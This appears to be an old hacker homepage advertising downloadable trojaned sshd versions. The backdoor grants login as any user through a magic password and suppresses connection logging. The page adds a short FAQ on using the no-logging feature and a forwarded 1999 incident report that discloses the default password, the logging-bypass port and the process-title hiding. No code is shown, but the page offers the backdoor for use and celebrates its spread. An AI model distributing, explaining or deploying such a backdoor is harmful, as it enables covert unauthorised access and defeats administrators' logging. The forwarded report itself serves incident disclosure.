SSH backdoor homepage ;)


sshd-1.2.22.c.gz - nice modification of ssh 1.2.22. Backdor, that allows yout to log on in the system (and stay invisible!) as any user by using magic password. Your connection will not be looged.
sshd.c.gz - the older, 1.2.21 version of sshd trojan.
trojan-sshd-1.2.26.tar.gz -- current version.


I received several questions about sshd trojan, here is simple FAQ:

Q: How to use full power of 1.2.26 new features?
A: sshd trojan 1.2.26 offers to you new feature: no logging, even no connection logging. To fully exploit it you must patch your own ssh client (do not better patch ssh client on the remote server ;). You must guess which files to patch. After that, the new option -T will allow you to specify sourceport.

Q: How to configure sshd backdoor?
A: Read the sourcecode of sshd.c :)


Welll, well, well... I found that this backdoor became quite famouce ;) That's good!
I think that it's really funny that so poor and, say that clear, lame program is so popular ;) OK, stop that bullshit, look at this:

---------- Forwarded message ----------
Date: Tue, 13 Jul 1999 08:26:01 -0700
From: Aleph One 
To: INCIDENTS@SECURITYFOCUS.COM
Subject: sshd trojan doing the rounds

From: Martin Hamilton 

-----BEGIN PGP SIGNED MESSAGE-----


Hi, just thought people might be interested in this sshd Trojan which
some k00l d00dz (or possibly script kiddies!) put onto one of our
machines last night - it's attributed to Kil3r of Lam3rz, BTW.

There are a couple of small but significant changes from regular ssh:

  1) a backdoor password which will always let you in as any user
      (default: "sexygurl")

  2) if you connect using a build-time nominated client side port
      (default: 31337 - duh!), sshd won't log your activities

  3) process title hiding (default: /bin/sh)

It's nice code, and very well commented - they left the source around
for us to read ;-)

Although I'd heard about ssh trojans existing, this is the first one
I've actually seen with my own eyes.  Fascinating stuff...

Martin



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBN4jTNNZdpXZXTSjhAQEprwP/U6kqjXtVVXlfysUV39EshjMalaE9Dr5n
qHqOoa6HMjmRTQv5qIkBQWKYhzOwpxr3W2d7BDVFcGIcyGQIB0CGHYYBnOd+UJ94
yIEvtqHf4Gy58KZ1GdEvMiPETLBrzm50lvWAI3TeouNyVjttujYFyoJFgCjni4Eu
Yx87ZdO2w7k=
=E/Vn
-----END PGP SIGNATURE-----


Cool, nah??? ;)))